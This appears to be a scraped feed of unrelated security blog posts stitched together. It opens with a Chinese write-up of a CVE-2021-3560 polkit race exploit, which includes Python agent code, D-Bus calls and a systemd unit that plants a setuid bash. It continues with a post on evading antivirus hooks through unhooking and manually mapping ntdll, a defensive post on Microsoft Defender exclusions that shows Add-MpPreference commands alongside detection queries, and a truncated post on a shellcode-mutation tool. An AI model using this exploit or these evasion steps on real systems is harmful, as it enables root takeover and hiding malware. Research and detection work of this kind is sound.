00:37:29.577: Operator of unix-process:186211:9138723 FAILED to authenticate to gain authorization for action org.freedesktop.timedate1.set-timezone for system-bus-name::1.6846 [python3 agent.py] (owned by unix-user:dev)

可见我们的 Authentication Agent 已经正常工作了,可以接收到 PolicyKit 发送的 BeginAuthentication 方法调用,并且PolicyKit 会提示 Only uid 0 may invoke this method,是因为我们的 AuthenticationAgentResponse 发送用户为 dev 用户而非 root 用户。

0x05. Trigger The Vulnerability

接下来尝试触发漏洞,我们尝试在发送完请求后立刻结束进程:

self._bus.send_message(message)
os.kill(os.getpid(), 9)

多次调用查看:

** (polkitd:186082): DEBUG: 01:09:17.375: In authentication_agent_response for cookie '51-20cf92ca04f0c6b029d0309dbfe699b5-1-3d3e63e4e98124979952a29a828057c7' and identity unix-user:root
** (polkitd:186082): DEBUG: 01:09:17.377: OUT: RET: 1
** (polkitd:186082): DEBUG: 01:09:17.377: Removing authentication agent for unix-process:189453:9329523 at name :1.6921, object path /org/freedesktop/PolicyKit1/AuthenticationAgent (disconnected from bus)
01:09:17.377: Unregistered Authentication Agent for unix-process:189453:9329523 (system bus name :1.6921, object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_US.UTF-8) (disconnected from bus)
** (polkitd:186082): DEBUG: 01:09:17.377: OUT: error
Error performing authentication: GDBus.Error:org.freedesktop.DBus.Error.NoReply: Message recipient disconnected from message bus without replying (g-dbus-error-quark 4)

(polkitd:186082): GLib-WARNING **: 01:09:17.379: GError set over the top of a previous GError or uninitialized memory.
This indicates a bug in someone's code. You must ensure an error is NULL before it's set.
The overwriting error message was: Failed to open file ?/proc/0/cmdline?: No such file or directory
Error opening `/proc/0/cmdline': GDBus.Error:org.freedesktop.DBus.Error.NameHasNoOwner: Could not get UID of name ':1.6921': no such name
** (polkitd:186082): DEBUG: 01:09:17.380: In check_authorization_challenge_cb
  subject                system-bus-name::1.6921
  action_id              org.freedesktop.timedate1.set-timezone
  was_dismissed          0
  authentication_success 0

可以发现,polkit_backend_interactive_authority_authentication_agent_response 函数的返回值为 TRUE,但是在 check_authorization_challenge_cb 函数中仍然是未授权状态,注意到 Error performing authentication 的错误信息,定位到函数 authentication_agent_begin_cb

static void
authentication_agent_begin_cb (GDBusProxy   *proxy,
                               GAsyncResult *res,
                               gpointer      user_data)
{
  error = NULL;
  result = g_dbus_proxy_call_finish (proxy, res, &error);
  if (result == NULL)
    {
      g_printerr ("Error performing authentication: %s (%s %d)\n",
                  error->message,
                  g_quark_to_string (error->domain),
                  error->code);
      if (error->domain == POLKIT_ERROR && error->code == POLKIT_ERROR_CANCELLED)
        was_dismissed = TRUE;
      g_error_free (error);
    }
  else
    {
      g_variant_unref (result);
      gained_authorization = session->is_authenticated;
      g_debug ("Authentication complete, is_authenticated = %d", session->is_authenticated);
    }

代码逻辑为,当 g_dbus_proxy_call_finish 函数没有错误的情况下,才会设置 is_authenticated 为 TRUE。而 g_dbus_proxy_call_finish 函数的作用描述如下:

Finishes an operation started with g_dbus_proxy_call().
You can then call g_dbus_proxy_call_finish() to get the result of the operation.

而同时错误信息也显示了:

Message recipient disconnected from message bus without replying

如果想成功的进行条件竞争,首先就需要解决这个问题。通过 dbus-monitor 命令观察正常情况和错误情况的调用结果,成功的情况如下所示:

method call   sender=:1.3174 -> destination=:1.3301 serial=6371 member=BeginAuthentication
method call   sender=:1.3301 -> destination=:1.3174 serial=6    member=AuthenticationAgentResponse2 
method return sender=:1.3301 -> destination=:1.3174 serial=7 reply_serial=6371

失败的情况如下所示:

method call sender=:1.3174 -> destination=:1.3301 serial=12514 member=BeginAuthentication 
method call sender=:1.3301 -> destination=:1.3174 serial=6     member=AuthenticationAgentResponse2 
error       sender=org.freedesktop.DBus -> destination=:1:3174 error_name=org.freedesktop.DBus.Error.NoReply

其中 :1:3174 为 PolicyKit,:1.3301 为 Authentication Agent。成功的情况下,Authentication Agent 会发送一个 method return 消息,指向的是 BeginAuthentication 的调用序列号,表示这个方法已经成功调用了,而失败的情况下则是由 D-Bus Daemon 向 PolicyKit 发送一个 NoReply 的错误。

0x06. The Time Window

通过以上分析可以得到我们的漏洞触发的时间窗口:在发送 method return 消息后,在获取 AuthenticationAgentResponse2 的 caller 前结束进程。为了精确控制消息发送,我们修改 Authentication Agent 的代码如下:

    @dbus.service.method(
            dbus_interface="org.freedesktop.PolicyKit1.AuthenticationAgent",
            in_signature="sssa{ss}saa{sa{sv}}", message_keyword='_msg')
    def BeginAuthentication(self, action_id, message, icon_name, details,
                            cookie, identities, _msg):
        print('[*] Received authentication request')
        print('[*] Action ID: {}'.format(action_id))
        print('[*] Cookie: {}'.format(cookie))


        def send(msg):
            self._bus.send_message(msg)

        ret_message = dbus.lowlevel.MethodReturnMessage(_msg)
        message = dbus.lowlevel.MethodCallMessage('org.freedesktop.PolicyKit1',
                                                  '/org/freedesktop/PolicyKit1/Authority',
                                                  'org.freedesktop.PolicyKit1.Authority',
                                                  'AuthenticationAgentResponse2')
        message.append(dbus.types.UInt32(os.getuid()))
        message.append(cookie)
        message.append(identities[0])
        threading.Thread(target=send, args=(message, )).start()
        threading.Thread(target=send, args=(ret_message, )).start()
        os.kill(os.getpid(), 9)

查看 PolicyKit 输出,发现已经成功认证:

** (polkitd:192813): DEBUG: 01:42:29.925: In authentication_agent_response for cookie '3-7c19ac0c4623cf4548b91ef08584209f-1-22daebe24c317a3d64d74d2acd307468' and identity unix-user:root
** (polkitd:192813): DEBUG: 01:42:29.928: OUT: RET: 1
** (polkitd:192813): DEBUG: 01:42:29.928: Authentication complete, is_authenticated = 1

(polkitd:192813): GLib-WARNING **: 01:42:29.934: GError set over the top of a previous GError or uninitialized memory.
This indicates a bug in someone's code. You must ensure an error is NULL before it's set.
The overwriting error message was: Failed to open file ?/proc/0/cmdline?: No such file or directory
Error opening `/proc/0/cmdline': GDBus.Error:org.freedesktop.DBus.Error.NameHasNoOwner: Could not get UID of name ':1.7428': no such name
** (polkitd:192813): DEBUG: 01:42:29.934: In check_authorization_challenge_cb
  subject                system-bus-name::1.7428
  action_id              org.freedesktop.timedate1.set-timezone
  was_dismissed          0
  authentication_success 1

同时系统时区也已经成功更改。

0x07. Before The Exploit

相比于漏洞作者给出的 Account Daemon 利用,我选择了使用 org.freedesktop.systemd1。首先我们摆脱了必须使用 org.freedesktop.policykit.imply 修饰过的方法的限制,其次因为这个 D-Bus Service 几乎在每个 Linux 系统都存在,最后是因为这个方法存在一些高风险方法。

$ gdbus introspect --system -d org.freedesktop.systemd1 -o /org/freedesktop/systemd1
...
  interface org.freedesktop.systemd1.Manager {
      ...
      StartUnit(in  s arg_0,
                in  s arg_1,
                out o arg_2);
      ...
      EnableUnitFiles(in  as arg_0,
                      in  b arg_1,
                      in  b arg_2,
                      out b arg_3,
                      out a(sss) arg_4);
      ...
  }
...

EnableUnitFiles 可以接受传入一组 systemd 单元文件路径,并加载进入 systemd,接着再调用ReloadStartUnit 方法后即可以 root 权限执行任意命令。systemd 单元文件内容如下:

[Unit]
AllowIsolate=no

[Service]
ExecStart=/bin/bash -c 'cp /bin/bash /usr/local/bin/pwned; chmod +s /usr/local/bin/pwned'

看似流程非常明确,但是在实际利用中却出现了问题。问题出在 EnableUnitFiles  方法,首先编写代码调用此方法:

def enable_unit_files():
    print('[*] Starting EnableUnitFiles ...')
    bus = dbus.SystemBus(mainloop=DBusGMainLoop())
    obj = bus.get_object('org.freedesktop.systemd1', '/org/freedesktop/systemd1')
    interface = dbus.Interface(obj, dbus_interface='org.freedesktop.systemd1.Manager')
    interface.EnableUnitFiles(['test'], True, True, reply_handler=handler, error_handler=handler)

运行后输出如下:

dev@test:~$ python3 agent.py
[*] Starting EnableUnitFiles ...
[+] PolicyKit authentication agent registered successfully
[*] D-Bus message loop now running ...
[*] Method response: (DBusException(dbus.String('Interactive authentication required.')),)

可见并没有进入我们注册的 Authentication Agent,而是直接输出了 Interactive authentication required 的错误信息。通过实际的代码分析,定位到如下代码逻辑:

static void
polkit_backend_interactive_authority_check_authorization (PolkitBackendAuthority         *authority,
                                                          PolkitSubject                  *caller,
                                                          PolkitSubject                  *subject,
                                                          const gchar                    *action_id,
                                                          PolkitDetails                  *details,
                                                          PolkitCheckAuthorizationFlags   flags,
                                                          GCancellable                   *cancellable,
                                                          GAsyncReadyCallback             callback,
                                                          gpointer                        user_data)
{
  // ...
  if (polkit_authorization_result_get_is_challenge (result) &&
      (flags & POLKIT_CHECK_AUTHORIZATION_FLAGS_ALLOW_USER_INTERACTION))
    {
      AuthenticationAgent *agent;
      agent = get_authentication_agent_for_subject (interactive_authority, subject);
      if (agent != NULL)
        {
          g_object_unref (result);
          result = NULL;

          g_debug (" using authentication agent for challenge");
          authentication_agent_initiate_challenge (agent,
                                                   // ...
          goto out;
        }
    }

这里检查了 Message Flags 的 POLKIT_CHECK_AUTHORIZATION_FLAGS_ALLOW_USER_INTERACTION 是不是为 0,如果是 0,则不会进入到使用 Authencation Agent 的分支。通过查阅文档,我发现 POLKIT_CHECK_AUTHORIZATION_FLAGS_ALLOW_USER_INTERACTION 是消息发送者可控的,D-Bus 的类库提供了相应的 setter:https://dbus.freedesktop.org/doc/api/html/group__DBusMessage.html#gae734e7f4079375a0256d9e7f855ec4e4,也就是 dbus_message_set_allow_interactive_authorization 方法。

但是当我去翻阅 dbus-python 的文档时,发现其并没有提供这个方法。于是我修改了版 dbus-python添加了此方法,地址为:https://gitlab.freedesktop.org/RicterZ/dbus-python

PyDoc_STRVAR(Message_set_allow_interactive_authorization__doc__,
"message.set_allow_interactive_authorization(bool) -> None\n"
"Set allow interactive authorization flag to this message.\n");
static PyObject *
Message_set_allow_interactive_authorization(Message *self, PyObject *args)
{
    int value;
    if (!PyArg_ParseTuple(args, "i", &value)) return NULL;
    if (!self->msg) return DBusPy_RaiseUnusableMessage();
    dbus_message_set_allow_interactive_authorization(self->msg, value ? TRUE : FALSE);
    Py_RETURN_NONE;
}

同时这项修改已经提交 Merge Request 了,希望之后会被合并。

0x08. The Final Exploit

添加了 set_allow_interactive_authorization 后,利用 dbus-python 提供的低级接口构建消息:

def method_call_install_service():
    time.sleep(0.1)
    print('[*] Enable systemd unit file \'{}\' ...'.format(FILENAME))
    bus2 = dbus.SystemBus(mainloop=DBusGMainLoop())
    message = dbus.lowlevel.MethodCallMessage(NAME, OBJECT, IFACE, 'EnableUnitFiles')
    message.set_allow_interactive_authorization(True)
    message.set_no_reply(True)
    message.append(['/tmp/{}'.format(FILENAME)])
    message.append(True)
    message.append(True)
    bus2.send_message(message)

设置之后再发送即可收到 PolicyKit 发来的 BeginAuthentication 请求了。实际编写框架已经大体明了了,写一个利用出来并不困难。最终利用成功截图如下:

A New Exploit Method for CVE-2021-3560 PolicyKit Linux Privilege Escalation

Golang 和 C 版本的利用代码如下:

0x09. Conclusion

CVE-2021-3560 是一个危害被低估的漏洞,我认为是由于漏洞作者不是特别熟悉 D-Bus 和 PolicyKit 的相关机制导致错过了 Authentication Agent 的特性,从而构建出限制较大的 PoC。我自是不敢说精通 D-Bus 和 PolicyKit,但是在最近时间的漏洞挖掘和研究过程中,参考了大量的文档、历史漏洞分析,同时阅读了大量的代码后,才能意识到使用 Authentication Agent 来进行利用的可能性。

同时,作为一个 Web 漏洞的安全研究员,我自是将所有的东西都类型转换到 Web 层面去看待。D-Bus 和 Web 非常相似,在挖掘提权的过程中并没有受到特别大的阻力,却收获了非常多的成果。希望各位安全从业者通过 D-Bus 来入门二进制,跳出自己的舒适圈,也可以增加自己在漏洞挖掘中的视野(什么,内存破坏洞?想都不要想了,开摆.jpg)。

0x0a. Reference

Homemade Fuzzing Platform Recipe

By: Ylabs
26 August 2021 at 15:30
Reading Time: 5 minutes It’s no secret that, since the beginning of the year, I’ve spent a good amount of time learning how to fuzz different Windows software, triaging crashes, filling CVE forms, writing harnesses and custom tools to aid in the process.Today I would like to sneak peek into my high-level process of designing a Homemade Fuzzing Platform, […]

Defeating Antivirus Real-time Protection From The Inside

28 July 2016 at 05:01
Defeating Antivirus Real-time Protection From The Inside

Hello again! In this post I'd like to talk about the research I did some time ago on antivirus real-time protection mechanism and how I found effective ways to evade it. This method may even work for evading analysis in sandbox environments, but I haven't tested that yet.

The specific AV I was testing this method with was BitDefender. It performs real-time protection for every process in user-mode and detects suspicious behaviour patterns by monitoring the calls to Windows API.

Without further ado, let's jump right to it.

What is Realtime Protection?

Detecting malware by signature detection is still used, but it is not very efficient. More and more malware use polymorphism, metamorphism, encryption or code obfuscation in order to make itself extremely hard to detect using the old detection methods. Most new generation AV software implement behavioral detection analysis. They monitor every running process on the PC and look for suspicious activity patterns that may indicate the computer was infected with malware.

As an example, let's imagine a program that doesn't create any user interface (dialogs, windows etc.) and as soon as it starts, it wants to connect and download files from external server in Romania. This kind of behaviour is extremely suspicious and most AV software with real-time protection, will stop such process and flag it as dangerous even though it may have been seen for the first time.

Now you may ask - how does such protection work and how does the AV know what the monitored process is doing? In majority of cases, AV injects its own code into the running process, which then performs Windows API hooking of specific API functions that are of interest to the protection software. API hooking allows the AV to see exactly what function is called, when and with what parameters. Cuckoo Sandbox, for example, does the same thing for generating the detailed report on how the running program interacts with the operating system.

Let's take a look at how the hook would look like for CreateFileW API imported from kernel32.dll library.

This is how the function code looks like in its original form:

76B73EFC > 8BFF                         MOV EDI,EDI
76B73EFE   55                           PUSH EBP
76B73EFF   8BEC                         MOV EBP,ESP
76B73F01   51                           PUSH ECX
76B73F02   51                           PUSH ECX
76B73F03   FF75 08                      PUSH DWORD PTR SS:[EBP+8]
76B73F06   8D45 F8                      LEA EAX,DWORD PTR SS:[EBP-8]
...
76B73F41   E8 35D7FFFF                  CALL <JMP.&API-MS-Win-Core-File-L1-1-0.C>
76B73F46   C9                           LEAVE
76B73F47   C2 1C00                      RETN 1C

Now if an AV was to hook this function, it would replace the first few bytes with a JMP instruction that would redirect the execution flow to its own hook handler function. That way AV would register the execution of this API with all parameters lying on the stack at that moment. After the AV hook handler finishes, they would execute the original set of bytes, replaced by the JMP instruction and jump back to the API function for the process to continue its execution.

This is how the function code would look like with the injected JMP instruction:

Hook handler:
1D001000     < main hook handler code - logging and monitoring >
...
1D001020     8BFF                       MOV EDI,EDI              ; original code that was replaced with the JMP is executed
1D001022     55                         PUSH EBP
1D001023     8BEC                       MOV EBP,ESP
1D001025    -E9 D72EB759                JMP kernel32.76B73F01    ; jump back to CreateFileW to instruction right after the hook jump

CreateFileW:
76B73EFC >-E9 FFD048A6                  JMP handler.1D001000     ; jump to hook handler
76B73F01   51                           PUSH ECX                 ; execution returns here after hook handler has done its job
76B73F02   51                           PUSH ECX
76B73F03   FF75 08                      PUSH DWORD PTR SS:[EBP+8]
76B73F06   8D45 F8                      LEA EAX,DWORD PTR SS:[EBP-8]
...
76B73F46   C9                           LEAVE
76B73F47   C2 1C00                      RETN 1C

There are multiple ways of hooking code, but this one is the fastest and doesn't create too much bottleneck in code execution performance. Other hooking techniques involve injecting INT3 instructions or properly setting up Debug Registers and handling them with your own exception handlers that later redirect execution to hook handlers.

Now that you know how real-time protection works and how exactly it involves API hooking, I can proceed to explain the methods of bypassing it.

There are AV products on the market that perform real-time monitoring in kernel-mode (Ring0), but this is out of scope of this post and I will focus only on bypassing protections of AV products that perform monitoring in user-mode (Ring3).

The Unhooking Flashbang

As you know already, the real-time protection relies solely on API hook handlers to be executed. Only when the AV hook handler is executed, the protection software can register the call of the API, monitor the parameters and continue mapping the process activity.

It is obvious that in order to completely disable the protection, we need to remove API hooks and as a result the protection software will become blind to everything we do.

In our own application, we control the whole process memory space. AV, with its injected code, is just an intruder trying to tamper with our software's functionality, but we are the king of our land.

Steps to take should be as follows:

  1. Enumerate all loaded DLL libraries in current process.
  2. Find entry-point address of every imported API function of each DLL library.
  3. Remove the injected hook JMP instruction by replacing it with the API's original bytes.

It all seems fairly simple until the point of restoring the API function's original code, from before, when the hook JMP was injected. Getting the original bytes from hook handlers is out of question as there is no way to find out which part of the handler's code is the original API function prologue code. So, how to find the original bytes?

The answer is: Manually retrieve them by reading the respective DLL library file stored on disk. The DLL files contain all the original code.

In order to find the original first 16 bytes (which is more than enough) of CreateFileW API, the process is as follows:

  1. Read the contents of kernel32.dll file from Windows system folder into memory. I will call this module raw_module.
  2. Get the base address of the imported kernel32.dll module in our current process. I will call the imported module imported_module.
  3. Fix the relocations of the manually loaded raw_module with base address of imported_module (retrieved in step 2). This will make all fixed address memory references look the same as they would in the current imported_module (complying with ASLR).
  4. Parse the raw_module export table and find the address of CreateFileW API.
  5. Copy the original 16 bytes from the found exported API address to the address of the currently imported API where the JMP hook resides.

This will effectively overwrite the current JMP with the original bytes of any API.

If you want to read more on parsing Portable Executable files, the best tutorial was written by Iczelion (the website has a great 90's feel too!). Among many subjects, you can learn about parsing the import table and export table of PE files.

When parsing the import table, you need to keep in mind that Microsoft, with release of Windows 7, introduced a strange creature called API Set Schema. It is very important to properly parse the imports pointing to these DLLs. There is a very good explanation of this entity by Geoff Chappel in his The API Set Schema article.

Stealth Calling

The API unhooking method may fool most of the AV products that perform their behavioral analysis in user-mode. This however does not fool enough, the automated sandbox analysis tools like Cuckoo Sandbox. Cuckoo apparently is able to detect if API hooks, it put in place, were removed. That makes the previous method ineffective in the long run.

I thought of another method on how to bypass AV/sandbox monitoring. I am positive it would work, even though I have yet to put it into practice. For sure there is already malware out there implementing this technique.

First of all, I must mention that ntdll.dll library serves as the direct passage between user-mode and kernel-mode. Its exported APIs directly communicate with Windows kernel by using syscalls. Most of the other Windows libraries eventually call APIs from ntdll.dll.

Let's take a look at the code of ZwCreateFile API from ntdll.dll on Windows 7 in WOW64 mode:

77D200F4 > B8 52000000                  MOV EAX,52
77D200F9   33C9                         XOR ECX,ECX
77D200FB   8D5424 04                    LEA EDX,DWORD PTR SS:[ESP+4]
77D200FF   64:FF15 C0000000             CALL DWORD PTR FS:[C0]
77D20106   83C4 04                      ADD ESP,4
77D20109   C2 2C00                      RETN 2C

Basically what it does is pass EAX = 0x52 with stack arguments pointer in EDX to the function, stored in TIB at offset 0xC0. The call switches the CPU mode from 32-bit to 64-bit and executes the syscall in Ring0 to NtCreateFile. 0x52 is the syscall for NtCreateFile on my Windows 7 system, but the syscall numbers are different between Windows versions and even between Service Packs, so it is never a good idea to rely on these numbers. You can find more information about syscalls on Simone Margaritelli blog here.

Most protection software will hook ntdll.dll API as it is the lowest level that you can get to, right in front of the kernel's doorstep. For example if you only hook CreateFileW in kernel32.dll which eventually calls ZwCreateFile in ntdll.dll, you will never catch direct API calls to ZwCreateFile. Although a hook in ZwCreateFile API will be triggered every time CreateFileW or CreateFileA is called as they both eventually must call the lowest level API that communicates directly with the kernel.

There is always one loaded instance of any imported DLL module. That means if any AV or sandbox solution wants to hook the API of a chosen DLL, they will find such module in current process' imported modules list. Following the DLL module's export table, they will find and hook the exported API function of interest.

Now, to the interesting part. What if we copied the code snippet, I pasted above from ntdll.dll, and implemented it in our own application's code. This would be an identical copy of ntdll.dll code that will execute a 0x52 syscall that was executed in our own code section. No user-mode protection software will ever find out about it.
It is an ideal method of bypassing any API hooks without actually detecting and unhooking them!

Thing is, as I mentioned before, we cannot trust the syscall numbers as they will differ between Windows versions. What we can do though is read the whole ntdll.dll library file from disk and manually map it into current process' address space. That way we will be able to execute the code which was prepared exclusively for our version of Windows, while having an exact copy of ntdll.dll outside of AV's reach.

I mentioned ntdll.dll for now as this DLL doesn't have any other dependencies. That means it doesn't have to load any other DLLs and call their API. Its every exported function passes the execution directly to the kernel and not to other user-mode DLLs. It shouldn't stop you from manually importing any other DLL (like kernel32.dll or user32.dll), the same way, if you make sure to walk through the DLLs import table and populate it manually while recursively importing all DLLs from the library's dependencies.
That way the manually mapped modules will use only other manually mapped dependencies and they will never have to touch the modules that were loaded into the address space when the program was started.

Afterwards, it is only a matter of calling the API functions from your manually mapped DLL files in memory and you can be sure that no AV or sandbox software will ever be able to detect such calls or hook them in user-mode.

Conclusion

There is certainly nothing that user-mode AV or sandbox software can do about the evasion methods I described above, other than going deeper into Ring0 and monitoring the process activity from the kernel.

The unhooking method can be countered by protection software re-hooking the API functions, but then the APIs can by unhooked again and the cat and mouse game will never end. In my opinion the stealth calling method is much more professional as it is completely unintrusive, but a bit harder to implement. I may spend some time on the implementation that I will test against all popular sandbox analysis software and publish the results.

As always, I'm always happy to hear your feedback or ideas.

You can hit me up on Twitter @mrgretzky or send an email to [email protected].

Enjoy and see you next time!

Can we block the addition of local Microsoft Defender Antivirus exclusions?

2 December 2022 at 09:00

Introduction

A few weeks ago, I got a question from a client to check how they could prevent administrators, including local administrators on their device, to add exclusions in Microsoft Defender Antivirus. I first thought it was going to be pretty easy by pushing some settings via Microsoft Endpoint Manager. However, after doing some research and tests in a lab environment, I discovered that it might not be as easy as I thought.

What capabilities in Microsoft Defender Antivirus can help us?

Microsoft Defender Antivirus, which is part of the Microsoft Defender for Endpoint (MDE), is one component of the next-generation protection solution. Microsoft Defender Antivirus comes with different features that can be configured using Microsoft Endpoint Manager (MEM)/Intune, Group Policy, PowerShell, etc. These features include cloud-delivered and real-time protection with behavioral, heuristic and machine learning-based protection.

Because some business applications might be blocked by these capabilities, there is the possibility to create specific exclusions for files, processes and processed-opened files from Microsoft Defender Antivirus scans, real-time protection and monitoring. Although they can be useful to benefit from the protection capabilities while preventing any impact on end users and business flows, they represent a protection gap. Indeed, the more exclusions there are, the larger the attack surface is. Therefore, it is a best practice to keep them as limited as possible and to review them periodically.

Because these are protection gaps, you don’t want users from adding exclusions locally on their laptop. By default, standard users can’t change, add or remove exclusions. However, administrators can. This is where our problems start. Indeed, we want to prevent that users help themselves to install suspicious software and we don’t want attackers that would have gained sufficient privileges to add exclusions so that they can install and run their malicious payloads.

How can we prevent users from adding exclusions? We can? Right? We will go over different possibilities in Microsoft Defender for Endpoint to do so.

Tamper Protection

First, let’s have a look at Tamper Protection. By searching on the Internet, I found a few posts mentioning that Tamper Protection could help us to solve this issue.

Tamper Protection is a feature that allows to protect specific protection settings against tampering as its name suggests. The main objective of Tamper Protection is to make sure attackers can’t disable security features to get easier access to your data, install malware or run exploits. In practice, Tamper Protection allows to prevent the following:

  • Disabling virus and threat protection
  • Disabling real-time protection
  • Turning off behavior monitoring
  • Disabling antivirus protection, such as IOfficeAntivirus (IOAV)
  • Disabling cloud-delivered protection
  • Removing security intelligence updates
  • Disabling automatic actions on detected threats
  • Suppressing notifications in the Windows Security app
  • Disabling scanning of archives and network files

Therefore, we can already see that this is not going to help us here. I can also confirm this based on the tests that I have done. During the tests, Tamper Protection is enabled at the tenant level in the Microsoft 365 Defender portal and therefore applied to all devices by default.

Local Admin Merge

Secondly, we have the Defender “local admin merge” feature. This capability looks more interesting. Indeed, it allows to control if exclusion list settings, which are configured by a local admin, will merge with managed settings from an Intune policy. We can use a Microsoft Defender Antivirus profile in Microsoft Endpoint Manager to configure it:

Enforce "Disable Local Admin Merge" in an Antivirus profile in MEM
Enforce “Disable Local Admin Merge” in an Antivirus profile in MEM

Three values are supported for the Disable Local Admin Merge:

  • Not configured: preference settings configured by local administrators will be merged into the resulting effective policy. If there are conflicts, settings from Intune will override local preference settings.
  • Enable Local Admin Merge: same as Not configured.
  • Disable Local Admin Merge: Intune-managed settings override preference settings that are configured by local administrators.

Theoretically, the Disable Local Admin Merge value would allow to prevent local admins from creating exclusions. We will test that in a moment, but let’s check first if this setting is correctly applied on my device. In the registry editor, I verify that the DisableLocalAdminMerge key is set to 1:

DisableLocalAdminMerge key set to 1 (enforced)
DisableLocalAdminMerge key set to 1 (enforced)

It seems to be the case here, great! If we go to Windows Security on the local machine, we can see that exclusions already exists and that we can’t add or manage them. This is because these policies have been pushed through Intune:

Existing exclusions configured via Intune
Existing exclusions configured via Intune

We will now see if we can still add local exclusions to download and run malicious software. First, if we try to download SharpHound for example, it will end up in the user’s download folder and get removed automatically:

Windows Security alert: Threat found
Windows Security alert: Threat found

As mentioned before, exclusions can be managed in PowerShell. We will add an exclusion for our download folder using the Add-MpPreference -ExclusionPath 'C:\Users\<USERNAME>\Downloads' (make sure to replace <USERNAME>) PowerShell cmdlet. Moreover, we can verify the exclusions that currently apply using Get-MpPreference as shown below:

Current exclusions in Microsoft Defender Antivirus
Current exclusions in Microsoft Defender Antivirus
Current exclusions in Microsoft Defender Antivirus

It looks like our exclusion has been successfully added (see ExclusionPath). Once added, SharpHound can be downloaded and is not removed by Microsoft Defender Antivirus. Additionally, if we bypass the Windows antimalware warning, it can be executed (my machine is not joined to any domain hence the error in SharpHound):

Run SharpHound
Run SharpHound

Note that alerts will still be generated in Microsoft 365 Defender for this action because the endpoint detection and response (EDR) capability of Microsoft Defender for Endpoint is running and antivirus exclusions do not apply to it. Indeed, the purpose of EDR is to detect post-breach activities. Usually, EDR is set in block mode to remediate these post-breach detections when a non-Microsoft antivirus product is running.

EDR detection for SharpHound

Based on that, it seems that Disable Local Admin Merge does not allow us to prevent local admins from adding exclusions via PowerShell. Note that it will also be the case via WMI using the MSFT_MpPreference class. In fact, from what I have observed during my testing is that the created exclusions will be overwritten when the device is restarted or when policies are pushed again. However, it did allow us to download and run SharpHound during this time.

Hide Exclusions From Local Admins

The last feature that I wanted to talk about is the Hide Exclusions From Local Admins setting. This setting is not available in Microsoft Defender Antivirus profile yet but can already be configured with a custom configuration profile or with a Group Policy, for example. When enabled, all exclusions in PowerShell, Windows Security and registry editor are not visible to administrators.

It can be configured using the following registry key: Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\HideExclusionsFromLocalAdmins.

Hide exclusions from local admins registry key
Hide exclusions from local admins registry key

If the value is set to 1 as it is currently the case, it blocks all access to exclusions to administrators as shown below:

  • Registry Editor:
Exclusions in Registry Editor can't be accessed
Exclusions in Registry Editor can’t be accessed
  • Windows Security application
Exclusions in Windows Security can't be accessed
Exclusions in Windows Security can’t be accessed
  • PowerShell
Exclusions can't be accessed using Defender PowerShell cmdlet
Exclusions can’t be accessed using Defender PowerShell cmdlet
Exclusions can't be accessed by browsing registry keys in PowerShell
Exclusions can’t be accessed by browsing registry keys in PowerShell

However, it does not allow to block admins from adding exclusions. Indeed, it only blocks them from accessing exclusions.

Detection

At the time of writing, there is currently no method to block administrators from adding exclusions. As a general guidance, it is a best practice to avoid granting local administrator permissions to users on their machine. However, it might not always be possible for multiple reasons. In this case, it might be interesting to implement detection measures.

In the Microsoft 365 Defender portal, custom detection rules can be created to detect and alert when such events occur. Moreover, if Microsoft Defender for Endpoint events are connected in Microsoft Sentinel, an analytics rule could also be created. We will focus on creating a custom detection rule in Advanced Hunting in the Microsoft 365 Defender portal as part of this blog post.

When adding an exclusion in Microsoft Defender Antivirus, a registry key is created. Therefore, we can query the DeviceRegistryEvents with the following Advanced Hunting query:

DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
| where RegistryKey contains "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions"

However, during my tests, I have noticed that exclusions are pushed again every time a device is restarted when configured in Intune. Therefore, this would generate a lot of false positives. To prevent that, exclusions could be defined in the query to make sure the rule only triggers on non-legitimate exclusions.

let exclusions = dynamic ([
"C:\\myapp",
"myapp.exe",
".app"
]);
DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
| where RegistryKey has "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions"
| where RegistryValueName !in (exclusions)

A custom detection rule can be created based on the DeviceId, and rule properties, such as response actions, can be specified to help investigation and remediation activities.

Conclusion

As we have seen during this blog post, it is currently not possible to block administrators from adding exclusions in Microsoft Defender for Endpoint. If local administrators are required on devices, detection mechanisms can be implemented to make sure your security operations teams have visibility on such events.

About the author

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security where he has gained extensive knowledge during many engagements, from designing and implementing Azure AD Conditional Access policies to deploying Microsoft 365 Defender security products. Additionally, Guillaume has recently gained interest into DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

You can find Guillaume on LinkedIn.

Avoiding Detection with Shellcode Mutator

By: Rob Bone
21 December 2022 at 09:00

Today we are releasing a new tool to help red teamers avoid detection. Shellcode is a small piece of code that is typically used as the payload in an exploit, and can often be detected by its “signature”, or unique pattern. Shellcode Mutator mutates exploit source code without affecting its functionality, changing its signature and making it harder to reliably detect as malicious.

Download Shellcode Mutator

github GitHub: https://github.com/nettitude/ShellcodeMutator

Background

One of the main benefits of writing your shellcode in assembly is that you have full control over the structure of the shellcode.

For example, the content and order of the functions in the source file can (obviously) be changed and the code compiled to produce a new version of your shellcode. These changes don’t have to be functional however, we can use automated tools to mutate the shellcode source so that each time we compile it the functionality stays the same, but the contents are changed.

This then means that the resultant shellcode will have a different size, file hash, byte order etc, which will make it harder to reliably detect both statically and in memory.

This ability is orthogonal to shellcode encryption etc, as at some point encrypted and encoded shellcode needs to be decrypted and decoded and descrambled so that it can actually be executed, and at this point it may get detected.

Let’s make use of a concrete, if a little contrived, example.

Test Case

We can take the nasm source code for some MessageBox shellcode from Didier Stevens, compile it as per his instructions and inject it and we successfully get a message box – so far so good.

Testing the default shellcode.

If we were to extract this shellcode as a blue teamer and want to write detections to catch it, we may note the hash, examine the contents and the disassembly and then write a yara rule to be able to catch it in memory or on disk.

As show below, we can take a quick peek at the binary using binary refinery.

Taking a quick peek at the binary using binary refinery.

We also note the sha256 hash is a8fb8c2b46ab00c0c5bc6aa8d9d6d5263a8c4d83ad465a9c50313da17c85fcb3.

Rizin can be used to examine the shellcode disassembly.

Examining the shellcode disassembly using rizin.

